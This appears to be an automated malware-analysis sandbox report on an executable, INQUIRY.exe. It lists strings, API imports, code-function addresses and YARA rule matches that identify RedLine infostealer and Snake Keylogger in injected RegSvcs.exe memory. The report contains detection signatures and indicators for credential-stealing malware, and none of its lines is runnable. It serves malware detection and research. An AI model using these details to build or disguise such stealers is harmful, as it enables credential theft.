              Source: INQUIRY.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_7f90e5e2-b
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A7A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00A7A1EF
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A68310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00A68310
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A751BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00A751BD
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A1E6A00_2_00A1E6A0
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A3D9750_2_00A3D975
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A321C50_2_00A321C5
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A462D20_2_00A462D2
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A903DA0_2_00A903DA
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A4242E0_2_00A4242E
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A325FA0_2_00A325FA
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A266E10_2_00A266E1
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A6E6160_2_00A6E616
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A4878F0_2_00A4878F
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A788890_2_00A78889
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A288080_2_00A28808
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A468440_2_00A46844
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A908570_2_00A90857
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A3CB210_2_00A3CB21
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A46DB60_2_00A46DB6
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A26F9E0_2_00A26F9E
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A230300_2_00A23030
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A331870_2_00A33187
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A3F1D90_2_00A3F1D9
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A112870_2_00A11287
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A314840_2_00A31484
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A255200_2_00A25520
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A376960_2_00A37696
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A257600_2_00A25760
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A319780_2_00A31978
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A49AB50_2_00A49AB5
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A1FCE00_2_00A1FCE0
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A3BDA60_2_00A3BDA6
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A31D900_2_00A31D90
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A97DDB0_2_00A97DDB
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A23FE00_2_00A23FE0
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A1DF000_2_00A1DF00
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_01DA36000_2_01DA3600
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_010136002_2_01013600
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00408C603_2_00408C60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040DC113_2_0040DC11
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00407C3F3_2_00407C3F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00418CCC3_2_00418CCC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00406CA03_2_00406CA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004028B03_2_004028B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041A4BE3_2_0041A4BE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00408C603_2_00408C60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004182443_2_00418244
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004016503_2_00401650
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00402F203_2_00402F20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004193C43_2_004193C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004187883_2_00418788
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00402F893_2_00402F89
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00402B903_2_00402B90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004073A03_2_004073A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02BA14373_2_02BA1437
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02BA14483_2_02BA1448
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02BA11A83_2_02BA11A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02BA11993_2_02BA1199
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06C636483_2_06C63648
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06C622A03_2_06C622A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0040E1D8 appears 43 times
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 00A30AE3 appears 70 times
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 00A17DE1 appears 35 times
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 00A38900 appears 42 times
              Source: INQUIRY.exe, 00000000.00000003.1692843757.0000000003CDD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INQUIRY.exe
              Source: INQUIRY.exe, 00000000.00000002.1694806382.0000000001DB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs INQUIRY.exe
              Source: INQUIRY.exe, 00000000.00000003.1693108053.0000000003B33000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INQUIRY.exe
              Source: INQUIRY.exe, 00000002.00000003.1708283244.00000000039D3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INQUIRY.exe
              Source: INQUIRY.exe, 00000002.00000003.1702806838.0000000003B3D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INQUIRY.exe
              Source: INQUIRY.exe, 00000002.00000002.1709473928.0000000001DE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs INQUIRY.exe
              Source: INQUIRY.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 0.2.INQUIRY.exe.1db0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 3.2.RegSvcs.exe.3f86458.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.3f86458.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 3.2.RegSvcs.exe.55a0000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.55a0000.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.55a0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.55a0000.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.2d10bbe.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.2d10bbe.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.3fae590.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.3fae590.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.INQUIRY.exe.1de0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.2d10bbe.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.2d10bbe.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.3f85570.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.3f85570.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.55a0ee8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.55a0ee8.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.2d11aa6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.2d11aa6.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.5630000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.5630000.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.3f85570.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.3f85570.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000000.00000002.1694806382.0000000001DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000003.00000002.4149427302.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
